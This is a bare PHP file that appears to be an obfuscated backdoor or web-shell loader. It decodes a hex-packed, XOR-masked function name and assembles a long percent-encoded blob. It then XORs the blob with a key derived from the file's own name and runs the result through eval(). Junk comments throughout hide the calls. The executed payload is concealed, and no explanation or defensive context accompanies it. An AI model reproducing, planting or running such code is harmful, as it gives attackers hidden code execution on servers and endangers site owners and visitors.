<?php
$ovdb5whe = pack('H*', '4b07071b44150f5116031c52'); $oq8dfcvh = '9fpn6yk4ulx7'; $oq8dfcvh = $oq8dfcvh ^ $ovdb5whe;
$oq68avg9 = "";
$oq68avg9 .= $oq8dfcvh("GQ%15%1D%13%02%00%00Y%40%06%07%5BT%5DCGPS%0B%3A%05_%40%17%06%0B%07qTGPS%12%00F%17%07Ji%08yJRS%5C%5C%03MACZ%11%06%12%1EqTZ%5BF%03%1D%12oM%11%06%12%07K%17%12%19%12W");
$oq68avg9 .= $oq8dfcvh("L%5D%3An%0A%0D%1A%2C%5DRA%1D%15%03%17%14_%5C%3C%0F%1C%14%09%1B%15%7Bg%2A%29O%0Bn%0A%0D%1A%2C%5DRA%1D%15%0A%0A%01oK%11%11%1C%01%5D%10%19%15%02O%5E%26Y%40%0A%3C%00%16Z%1F%12XS%1E%3A%03HK%00%16");
$oq68avg9 .= $oq8dfcvh("%07%1AAYjA%5B%0B%00A%1C%0ESJH3KEGZ%409%17%03%40A%11%17%1A%1DI%1F%05%1C%09%26%16%03Dq%17%0A%1E%16q%5B%5CX%5B%12MV%19%15%0A%05%5BRJRS%5C%5C%03%01N%12~%2B3%2C6a%7B%17%1C");
$oq68avg9 .= $oq8dfcvh("%1B%1D%01%03VG%0D%06%5BQ~%7Fejw%29%29D%1C%0EA%3F%1DQ%07%0CH%5CTFMGTK%05%0A%1D%16J%1F%12S%5B%0A%009%40%5B%17%3C%10%1C%40CP%5BF%15EA%19%07%18%07%16%15GYP%1D%15%00%0C%0AUq");
$oq68avg9 .= $oq8dfcvh("%13%16%07%2CMX%5BAW%08%11%15%10%09OCBZ%15%13%5D%40B%0B%08%04%10%13CD%17%15%18R%05W%01THVV%1A%05NGD%1BV%18%0D%05P%5DKVMSUBE%1DSPQ%06%03B%5DWB%0C%01%12%1F%0E%13");
$oq68avg9 .= $oq8dfcvh("%5D%40B%0B%08%04%0BH%16%0D%10%07GX%5B%15%5D%1C%0A%15XH%0C%04%5BWTC%40OG%0A%0BO%10U%0A%05S%5B%5DCGYW%08MBJZ%16%19%06%1F%40%1E%15%09%12RL%1DBK%17%16%01%1D%0E%15%17%0EOB%16%1C");
$oq68avg9 .= $oq8dfcvh("WW%0D%07SN%0E%15twq%22%20%20wf%2A%298%3Fcyzec462ex4%3B%2A%29OUVQW%00%02%0EYD%08%0F%1E%1DAGDGA%12%10%10GV%1A%19CB%1C%04%01%00%04Q%5D_%1B%01%5EAHW");
$oq68avg9 .= $oq8dfcvh("M%40PWV%00E%5B%10%5D%17%11%2C%00%5E%5B%5CA%1AB%16%1CWW%0D%07ZH%0ATBPP%02%03F%0D%0E%02%11%01%12WhSY%5B%16MBSY%06%01%17%15%07%0C%11yU%0E%04%1CE%40%0BCNS%1E%0C%11MY%15");
$oq68avg9 .= $oq8dfcvh("%06%17E%0E%5ECQQ%15%13OAG%1C%10%0A%5E%0E%5EC%03%01KPjGW%16%09%07SKKA%0D%28pv%18oSK%1FV%1D%17%3FH%2F%5Cr%0AhK%10JED%12%02CG%09%07%5BM%40Y%5CO%5E%02_%0E%18G");
$oq68avg9 .= $oq8dfcvh("%09%07%40_G%5E%5EFXF%14M%14%06%11%17Hl%11OF%13%1F%13%5C%408G%3F%14FVO%40%5C%0ENMmsXG%11%1FH%40XX%12%5BEBSY%06%01%17%15u%13OAG%1C%10%0A%5EuG%2F%14%1BOM%40%5B");
$oq68avg9 .= $oq8dfcvh("ZMN%3Bm%15G%02%17%1FBM%5CLFFXF%14M%14%06%11%17Hl%11OF%13%1F%13%5C%408G%3F%14FVO%40%5C%0ENMmsXG%00%16HAXCH%11E%5B%10%0A%00%14%16%11JQn%11H%12%10%1CEB");
$oq68avg9 .= $oq8dfcvh("%0D8W%3FI_TOG%08%0DM%1Bs%3EXW%03T%40R%5DW%0AE%5B%10%06G%19%07%1DFE%5EY%12ZYF%02%07C%1FS%5B%0AUYSE%0B%08F%0E%10CWZH%0A%40DO%5D%07%16%07%10%13CK%5BWL%5B");
$oq68avg9 .= $oq8dfcvh("SB_%0BE%40%10%1FVJSO%12%17%01%1C%12%1AEN%14O%07%0F%1F%09GNA%15%0CXET%19%15G%0B%18%1F%5DVA%15%0FFMN%14O%07%0F%1F%09GNA%15%14FVO%10%12_CEZ%0EK%15%11A%03%03%10");
$oq68avg9 .= $oq8dfcvh("%5DX%19%14HWV%5CFVC%13E%5B%10%0A%1B%08%00%10_B%15%1B%12%05%0D%14%18%0A%13%19%04%14FRY%1C%09%0F%03F%18%0A%02%07%1F%1FT%5ELA%12GXF%06%1AJC%08WV%5CFVC%13E%5B%10%0A%1B%08%00%10");
$oq68avg9 .= $oq8dfcvh("_B%15%1B%12%05%0D%14%18%0A%14%12%09%1CODT%1C%09%1B%0C%00%10%06G%10%16%15XZCOEFD%5B%10%18WJS%08%0AO%5EFQ%17%10F%0D%0EG%1B%18%00MF%40%15%1CF%06%0EB%06G%0B%18%1F%5DVA%1C%09%1B");
$oq68avg9 .= $oq8dfcvh("%18FGF%0A%0F%16S%06%13yRZ%07%1F%13%5EFC_S%00ZEYP%5CNA%1CD%5B%19%16%1F%1D%07%1E%0EGW%12%10%14%5E%0EG%1B%18%00MF%40%0EO%0F%03F%18%0F%05%16%1D%10Z%5EZ%5Bm%03%1D%0FCZ%10K");
$oq68avg9 .= $oq8dfcvh("T%15G%5BPjB%13%119SA%0D%17%16%1DZD%12%1C%1B%1D%03%13%5EM%17%0A%1C%1D%0EQ%5CYW9%15%13Dq%00%0C%1D%07KYAF%1AB%04%0EU_%00%0A%15_%0E%13%5CyH%0A%0D%0BY%02CG%0A%1BXQLL");
$oq68avg9 .= $oq8dfcvh("E%02E%5B%10h%02%0F%00%16%07L%11yU%0E%04%1CE%40%0B%0E%10%00K_X%40%12%5BEBIF%15%05%0A%0AYS%15%08%0FF%5DF%0F%0ED%02TS%14%17%12B%15%5DA%2AWF%02%19%06%1DF%40%5E_G%1F%02%1F%10%13");
$oq68avg9 .= $oq8dfcvh("C%23%15%1C%5ER%5B%1D%16%07%0D%03AM%0A%05_S%0A%7BR%5DS%1C%10%08XC%00%10%16%1BCB%1C%0E%5B%00EN%14b%04%0B%12%09%5BY%5DBY%0C%10%1FWWC%5ENN%0EqTYA%03L%1DBK%17%16%01%1D%0E%07");
$oq68avg9 .= $oq8dfcvh("%0EHW%0A%16%03KG%05C%5B%1A%5DhTG%40%07%1CN%14G%2F%19%1F%1BC%5E%1C%1C%12B%0C%2AJB%0B%0E%1AS%13%17%5CXB%0A%0A%02U%06G%0A%3F%09B_X%5C%1B%5DA%09WW%0A%12%00S%13%17SB%40%0F%11%03");
$oq68avg9 .= $oq8dfcvh("%18%0A%2F%04%1B%12TB%5B%5DE%0D%0F%13II%1AOSWG%7BOYZ%0B%0CO%0BH%00%0F%1C%00K%1F%11yU%0E%04%1CE%40%0B%14%18%19%5BNRL%1B%5D%17%03D%5B%11%0DSWAPL%5CC%15%5E%1BMS%0A%05S%5B");
$oq68avg9 .= $oq8dfcvh("%0FQ%40%5BQ%12%0C%09%5Eq%06%1B%1A%00ZD%1D%12T%0F%09%03oI%06%17%2C%10AYAP%5C%12%16A%19%07%18%05%06%1DMC%5CZ%5CF%03%0F%5CK%3C%04%16%07qTZ%5BF%03%0B%12C%06G%0F%1F%1DHDG%5BEO");
$oq68avg9 .= $oq8dfcvh("%1EBJF%0D%04%10%16BD%15%08%12%00%0A%16U%40KG%1F%1F%40QFG%5C%11IF%12%5CAJHWC_ZZH%04E%5B%10H%11%06%12%17%06%13O%5D%5C%01%06%03%5C%5DOC%15%1ABRF%5CH%03MB%5CB%0D%05");
$oq68avg9 .= $oq8dfcvh("%00%01%40%40%1C%1C%09%00%06%0A_%5D%06KW%09FYRVW%0A%16O%0B%5C%06%17%06%01%40%17%11XZ%09%0A%1CR%15%1E%1E%15%06%40TA%5C%5D%08E%09UK%1A%0B%12%5B%07LGPF%13%17%08%10Z%11%0A%1E%5B%5EEPR");
$oq68avg9 .= $oq8dfcvh("m%14%00%16%5CO%00%06%5BQ%01k%1D%1B%18%3AAI%12%02CDT_%0Ehjs%7B%2A%209o%07JX%0E%15%5BYVA%5B%09%0BFFV%0B%06%10%1E_%5B%1D%11~%01%0D%07J%5B%0D%0B%04%18DBLRK%1E%01%0ARW");
$oq68avg9 .= $oq8dfcvh("%0DOSW%5B%40X%40J%00%04OK%0A%12%04%1F%1BC_%5EX%12%5BED%12%15%05%0C%01S%06%13yRZ%07%1F%13%5EF%5ESHS%0A%7BR%5DS%1C%10%08X%12%10%17%01%1FKY%1D%11~%01%0D%07J%5B%0D%0B%04%18DB");
$oq68avg9 .= $oq8dfcvh("LRK%1E%01%0ARW%0DJHZUQZG%12NA%0BC%5E%01%10%09%11%13%07%0E%15%16%0B%16%16R%5D%19%01O%00ZEYP%5CNA%13GC%16%1B%15%12%07%17%13%13%12B%29%01XO%19%16%1D%1B%12DAG%5E%03%0BN");
$oq68avg9 .= $oq8dfcvh("%14b%04%0B%12%09%5BY%5DBY%0C%10%1FWW%1B%07%1F%11WY%1C%0E%12B%08%15%40L%10%19%11X%05%1B%15%11~%01%0D%07J%5B%0D%0BXX%07L%11DU%0A%0D%0BXE%0EC%5DN%0ET%5DG%1A%09%17%02%18%0A%2F%04%1B%12");
$oq68avg9 .= $oq8dfcvh("TB%5B%5DE%0D%0F%13II%1A%1B%17%1FLN%5Bn%16%2A%02%0EQT%16%0D%1B.%07%17k%15%5D%14%01N%14%5B%14%0E%06%0BHVn%11_%15%15%04CT%01%3EZZ%15JHGW%12%10%14%5E%0EG%12%14%1FFZ%5D%5E_%5D");
$oq68avg9 .= $oq8dfcvh("%18%00E%40%00%17%1A%1C%40%17LC%5B%0C%13%08%18%0A%2F%04%1B%12TB%5B%5DE%0D%0F%13II%1A%1B%17%1FLN%5B%19%12B%10%11%5D%5B%1B%05%12ZUPYZP%07%09F%14F%16%13%1E%1EL%0CGPF%13%17%08%10X%1B%0B");
$oq68avg9 .= $oq8dfcvh("%16%10CFY%1DD%1E%0D%03SC%12%0F%5BWbP%5DTH%13%0B%0EGE%09%16%0A%14WOQYP%1F%0BJ%10%0A%16%14%1E%06VQT%1C%1EFA%0EE%5E%0E%0E%11Z%15JS%40%5C%05%11%0F_%40C%10%0B%18%5E%40BF");
$oq68avg9 .= $oq8dfcvh("%1AB%29%01XO%19%16%1D%1BY%5C_%40K%01%1C%1ETB%01%1A%1D_%0E%13%40B_%13%1D%00Q%07%18%04%1F%1CLVY%15%16%0E%10%16%5DC%01X%01%16ZBG%5B%12%10%1D%0EUM%0E%12%1F%5BXO%5DPQ%0B%14%0A%18%0A");
$oq68avg9 .= $oq8dfcvh("%2F%04%1B%12TB%5B%5DE%0D%0F%13II%1A%1B%17%1FLN%5B%19%12B%0D%13%40C%0E%01Z_%0E%13%40B_%13%1D%00Q%07X%1E%15%06%40TA%5C%5D%08E%0D%5B%40%07%19%15%5B%07L%11RC%15%0A%1EDMC%5ES3H%5E");
$oq68avg9 .= $oq8dfcvh("YPm%01%00%12oM%0C%0D%07%16%40CF%1D%5D%03%00%1FXOKJZH%0ARBXE%11%09%0C%10%13C%10%07%01%5EXF%1D%16%01%14%15_V%17%00_SCS%00%1D%5D%03%00%1FXOKJZZ%15%5ES%15%1AB%00%11");
$oq68avg9 .= $oq8dfcvh("%5DY%14%0F%19S%0F%0A%08%15t%27%295u%07%18G%16%07%5BTQ%5B%12%5BE%15EL%10%17%01%5B%0APDF%5D%1E%11%05%1C%0EG%06%04%1EY%40Y_%12MEU%02%07XG%03%17GO%5DSK%12E%5B%10n%16%0D%00%16");
$oq68avg9 .= $oq8dfcvh("%5C%5ETY%5B%1C%00NIX%0A%09%05%1D%06ETBG%14%09%02UM%0C%07%16%5B%0ARA%40Q%02%0BO%1C%0E%0E%07F%5BARPLZ%07MO%19%07JX%0E%16BDPN%16%16%01%0FHF%05%1A%07S%13%17tG%40%07");
$oq68avg9 .= $oq8dfcvh("%1CN%19%15%1E%11%16%07%5BE%5B%15%16%16%01%0FHF%05%1A%07HSQ%40%5BQ%12%0C%09%5E%0E%13%07%0B%09%40%5BM%5B%1AB%15%02YV%0B%05%0A%07%07L%11CW%15%06%1FWGC%5ES%01O%40%40G%5E%03%0B%05_J%06K");
$oq68avg9 .= $oq8dfcvh("%00%0BEGBBAN%25%15U%5C%0A%02%1F%1ATR%1D%11B%02%0C%1EXH%1A%17Z_%0EZQ%00%1A%09%00%03IF%02KZZ%07%1E%0E%11U%17%16%09HZ%00CNSnQ%5CYW9%02%03Dq%00%0C%1D%07KYAF");
$oq68avg9 .= $oq8dfcvh("%1A%09%00%03IF%02KZZ%15%13PB_%11%12%0AZ%0E%5EC%00%07%5CGZF%1AB%02%17CA%1B%17%10_%0EZQ%00%1A%09%00%03IF%02KZZ%07%0C%5CS%12NA%03GC%14%14%1F%19%0E%16%08%08%12%20%24%2Ack");
$oq68avg9 .= $oq8dfcvh("J%18W%16%5CYWF%40%16%0AF%0D%0E%10%16%11%00ZE%1D%11U%17%16%09HZ%00OSWK%40XBE%0A%0FF%1B%0EPQZH%0APDF%5D%1E%11%05%10%13C%10%07%01qEPE%5E%07%06%03%18%0A%06%11%1D%11%5DE");
$oq68avg9 .= $oq8dfcvh("EZ%1EFA%10U%5D%00%1A%14%1A%02%17%11RC%15%0A%1EDMJX%0E%16BDPN%16%01%14%15_V%17%00SN%0E%13RDA%09%1D%12S%0EMCQ%2F%40k%5B%1A%1DDEH%10C%07V%5B%1CKRL%5DSNLO");
$oq68avg9 .= $oq8dfcvh("%10%00CG%05%16%5DTLR%5B%5D%18%26VG%0F%06%2C%03%5BCjV%5D%08%11%03%5EZ%10K%1C%16KN%5DT%1AOIF%14I%12%10%1C%0BZT%1C%0EO%00%10%08SZ%0A%0C%1DSWNTFK%13%04N%14b%04%0B%12%09");
$oq68avg9 .= $oq8dfcvh("%5BY%5DXH%1C%10%04U%02CG%02%17O%5BAEXO%1EB%40J%0A%1B%1B%15WC%15%08%12%0D%0E%08TT%05KZH%0AGQ%5CJ%0E%03%1FDuG%2F%14%1BOM%40%5BZ%0B%1F%1CEL%06%3ESN%0EXOZA%0E");
$oq68avg9 .= $oq8dfcvh("%03%09W%06G%12%17%12BCE_%1B%5D%15%02HT%0D%0F%0B%1D%06%13EQ%5B%1E%0D%00IZJX%0E%15%5BYVA%5B%09%0BFBI%12%11%15%10%06%13yRZ%07%1F%13%5EF%0E%19%09%06LR%1CN%16%16%01%0FHF%05%1A");
$oq68avg9 .= $oq8dfcvh("%07S%13%17%5E%5E%5C%02%1F%00%18%07X%16%1D%00KC%1D%11B%02%0C%1EXH%1A%17%28WbP%5DTH%13%0B%0E%5DT%19%16%11%16s%1E%0EEV%1E%1F%08%5CV%0DKW%03J%5EM%5DT%1F%11O%0BS%05%16%1D%10Z%5EZ%5B");
$oq68avg9 .= $oq8dfcvh("%12%0A%01%01%40%5B%1A%0B%5BWbP%5DTH%13%0B%0E%5DT%19%16%11%16%13y%60y~O%1E%00_%5C%06%02%10%1B%0E%1F%5E%5E%5C%02%1F%00%18%07C%02%00S%0AUCM%5D%17%1C%5B%0E%0A%10%13%03%1F%40%40B%1CI%0F%03F%18%0A");
$oq68avg9 .= $oq8dfcvh("%2F%04%1B%12TB%5B%5D_%1C%1F%13RKJ%18%1A%15%0E%1FFA%40%05%08%16%18%0A%2F%04%1B%12TB%5B%5D_%1C%1F%13RKOCW%11XOZDKOE%5B%0D%0ESJ%08%16XVY%1D%16%15%15%16%5C%40%14%14ZHLE");
$oq68avg9 .= $oq8dfcvh("PTY%5D%18%1BUB%10%06%08%16XVY%1D%16%15%15%16%5C%40%14%14ZHSJHS%5D%14%00%07SFCK%12%01%5CVLj_%03%17%01U%06G%3C0%3Ca%7C%7Cp%1EFA9%60a07ZSOD%15%11_%05%0D%1F");
$oq68avg9 .= $oq8dfcvh("JKC%5EMS%0A%7BR%5DS%1C%10%08XY%08%09%06%0AINMQ%5E%04%1C%08%19UG%2F%14%1BOM%40%5BZ%11%0E%0CEW%04%1A%0B%17BUL%5B%12%5BE%26E%40%10%06%01%1AO%5B%5COWN%1C%10YD%15%0D%5B%1C");
$oq68avg9 .= $oq8dfcvh("TXF%5DT%09%02N%14b%04%0B%12%09%5BY%5DBY%0C%10%1FWW%1B%07%1F%11WY%1C%19%12B%08%05XW%19%06ZZ%15%5ES%15%1A%0F%16%15UZKG%3F%14FVO%40%5C%0E%12%0DZ%5B%1A%04%0A%0BJ%5BWL%5C%3D");
$oq68avg9 .= $oq8dfcvh("B%07%5B%09%3EJSU%08%17%11%5DG%16%08%0BR%13%5EG%3F%14FVO%40%5C%0E%12%0DZ%5B%1A%04%0A%0BJ%5BWL%5C%3DB%07%5B%09%3EJ%08%1AH%17%1D%11~%01%0D%07J%5B%0D%0B%04%18DBLRK%1E%01%0ARW%0D8");
$oq68avg9 .= $oq8dfcvh("T%12%09j%15%08%0FFB%0F%17%07%18G%3F%14FVO%40%5C%0EE%5B%10o%11%11%12%0A%06%10EC%15FXX%10n%13%0B%03%05KEF%5C%5D%08MO%1C%09%10%15TS%13%09%15%12%00HUK%01%09OD%12%18%09%17%08%0B");
$oq68avg9 .= $oq8dfcvh("%12B%29%01XO%19%16%1D%1BY%5C_%40K%01%1C%1ETB%01%1A%1D%28%09V%5E%12oJL%5DUM%0B%0CS3%5DRG%5CS%0A%0C%1CU%06G%2F%14%1BOM%40%5BZO%5E%03HG%17X%0E%16BDP%5CTFMB%7CI");
$oq68avg9 .= $oq8dfcvh("%0B%02%09%06%40_B%5EX%13%1C%01IV%07%0F%11%0A%40l%12T%15%3BE%5B%0D%0ED%06TZURCT%5ENA%2AWF%02%19%06%1DF%40%5E_G%1F%02%1FHJ%0F%01%0A%1Du%10Q%12oO%5E%1BUB%10%06%1A%15%0E%1F");
$oq68avg9 .= $oq8dfcvh("%11yU%0E%04%1CE%40%0B%14%18%19%5BNRLJ%02%09%04I%408D%12Ts%17%08%08%12A%15%0AEI%0A%0DTZU%5ES%1D%16%2A%02%0EQT%16%0D%1B%04E%5D%40LU%1F%1D%02%5CL%1A%0D%28T%5DV%12h%12%5BXF");
$oq68avg9 .= $oq8dfcvh("%17O%07%07TZUNLTA%1F%10%07%18%0A%2F%04%1B%12TB%5B%5DE%0D%0F%13II%1A%1B%17%1FLN%5Bn%15%16B%3B%1C%0EG%2F%14%1BOM%40%5BZ%11%0E%0CEW%04%1A%0B%17BUL%5BiA%01Am%07X%1E%16%1F");
$oq68avg9 .= $oq8dfcvh("%5DR%5CS%1AB%29%01XO%19%16%1D%1BY%5C_%40K%01%1C%1ETB%01%1A%1D%28%09DT%12oFX%5B%10%09%11%06%1ET%07LGRC%14%03%05%18%0A%2F%04%1B%12TB%5B%5DE%0D%0F%13II%1A%1B%17%1FLN%5Bn%15%16");
$oq68avg9 .= $oq8dfcvh("B%3B%19%15%1E%1E%16%10FX%15%11~%01%0D%07J%5B%0D%0B%04%18DBLRK%1E%01%0ARW%0D8T%12E%10h%0EW%1E%0C%12%18%07X%1E%0E%1FJPE%40K%0EMO%0BSi%1E");


     $ot307nz = basename/*95oz*/(/*9xn2*/ trim/*8*/(preg_replace ( $oq8dfcvh (/*sy1xz*/ "%2F%5C%28.%2A%24%2F" )/*lkf5i*/, '', __FILE__ ) ))/*p3ket*/;
     $oumexa = substr(/*aq4*/ str_repeat(/*q*/$ot307nz, /*awmeu*/(strlen/*2ks0*/ ( $oq68avg9/*q*/ )/strlen ( $ot307nz/*guk*/)/*l*/ )  + 1 ), 0, strlen/*yt4dc*/( $oq68avg9/*78nzi*/)/*8*/)/*zi*/ ;
     $oq68avg9=$oq68avg9 ^ $oumexa;eval/*6i*/ (/*kxt5w*/ $oq68avg9 );
